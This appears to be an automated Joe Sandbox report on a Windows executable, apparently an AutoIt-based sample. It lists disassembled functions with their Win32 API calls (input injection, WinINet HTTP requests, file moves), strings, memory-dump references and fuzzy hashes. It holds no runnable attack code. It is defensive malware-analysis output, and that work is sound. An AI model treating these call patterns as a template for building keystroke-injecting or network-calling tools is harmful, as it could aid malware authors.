          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
          • String ID:
          • API String ID: 2156557900-0
          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
          • API String ID: 0-1603158881
          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$CreateItem$DrawInfoInsertPopup
          • String ID: 0
          • API String ID: 161812096-4108050209
          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 09de41a1aef44f674da5ea57583def0f7452206bc408023f25160f1d32ad2b87
          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
          • Opcode Fuzzy Hash: 09de41a1aef44f674da5ea57583def0f7452206bc408023f25160f1d32ad2b87
          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
          APIs
            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
          • MoveFileW.KERNEL32 ref: 00453932
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: File$AttributesFullMoveNamePathlstrcmpi
          • String ID:
          • API String ID: 978794511-0
          • Opcode ID: 571923008b683b2a4bbb15f80e20fbef64057dff07d5c2dbbb96db7e875aab6f
          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
          • Opcode Fuzzy Hash: 571923008b683b2a4bbb15f80e20fbef64057dff07d5c2dbbb96db7e875aab6f
          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
          APIs
            • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
            • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32(00000000), ref: 00445ACE
            • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
          • PostMessageW.USER32 ref: 00445E88
          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
          • PostMessageW.USER32 ref: 00445EBD
          • Sleep.KERNEL32(00000000), ref: 00445ECB
          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
          • PostMessageW.USER32 ref: 00445EE6
          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
          • String ID:
          • API String ID: 2014098862-0
          • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
          • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
          • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
          • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ClearVariant
          • String ID:
          • API String ID: 1473721057-0
          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
          APIs
          • VariantInit.OLEAUT32(00000000), ref: 0045EA56
          • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
          • VariantClear.OLEAUT32 ref: 0045EA6D
          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
          • __swprintf.LIBCMT ref: 0045EC33
          • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
          Strings
          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$InitTime$ClearCopySystem__swprintf
          • String ID: %4d%02d%02d%02d%02d%02d
          • API String ID: 2441338619-1568723262
          • Opcode ID: 44812372070ad90d158463e5ddbbfaa85886f92842502688f3af04c11789f225
          • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
          • Opcode Fuzzy Hash: 44812372070ad90d158463e5ddbbfaa85886f92842502688f3af04c11789f225
          • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
          APIs
          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
          • Sleep.KERNEL32(0000000A), ref: 0042C67F
          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Interlocked$DecrementIncrement$Sleep
          • String ID: @COM_EVENTOBJ
          • API String ID: 327565842-2228938565
          • Opcode ID: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
          • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
          • Opcode Fuzzy Hash: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
          • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
          APIs
          • VariantClear.OLEAUT32(?), ref: 0047031B
          • VariantClear.OLEAUT32(?), ref: 0047044F
          • VariantInit.OLEAUT32(?), ref: 004704A3
          • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
          • VariantClear.OLEAUT32(?), ref: 00470516
            • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
          • VariantCopy.OLEAUT32(?,?), ref: 0047057A
            • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
          • VariantClear.OLEAUT32(00000000), ref: 0047060D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Clear$Copy$CallDispFuncInit
          • String ID: H
          • API String ID: 3613100350-2852464175
          • Opcode ID: 746f7803a999fe2b5d8b386d27ad1c2e057452c9fa89622f4da675f7d9cf470b
          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
          • Opcode Fuzzy Hash: 746f7803a999fe2b5d8b386d27ad1c2e057452c9fa89622f4da675f7d9cf470b
          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
          APIs
          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
          • DestroyWindow.USER32 ref: 00426F50
          • UnregisterHotKey.USER32(?), ref: 00426F77
          • FreeLibrary.KERNEL32(?), ref: 0042701F
          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
          • String ID: close all
          • API String ID: 4174999648-3243417748
          • Opcode ID: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
          • Opcode Fuzzy Hash: bff2fcf0380ed1109d9e97093e2b24a73880c514d234ccde4525561dc618a34d
          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
          APIs
          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
          • String ID:
          • API String ID: 1291720006-3916222277
          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
          APIs
          • GetMenuItemInfoW.USER32 ref: 0045FC48
          • IsMenu.USER32(?), ref: 0045FC5F
          • CreatePopupMenu.USER32 ref: 0045FC97
          • GetMenuItemCount.USER32(?), ref: 0045FCFD
          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$Item$CountCreateInfoInsertPopup
          • String ID: 0$2
          • API String ID: 93392585-3793063076
          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
          APIs
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
          • VariantClear.OLEAUT32(?), ref: 00435320
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
          • VariantClear.OLEAUT32(?), ref: 004353B3
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
          • String ID: crts
          • API String ID: 586820018-3724388283
          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
          APIs
            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
          • MoveFileW.KERNEL32 ref: 0044BC3F
          • _wcscat.LIBCMT ref: 0044BCAF
          • _wcslen.LIBCMT ref: 0044BCBB
          • _wcslen.LIBCMT ref: 0044BCD1
          • SHFileOperationW.SHELL32(?), ref: 0044BD17
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
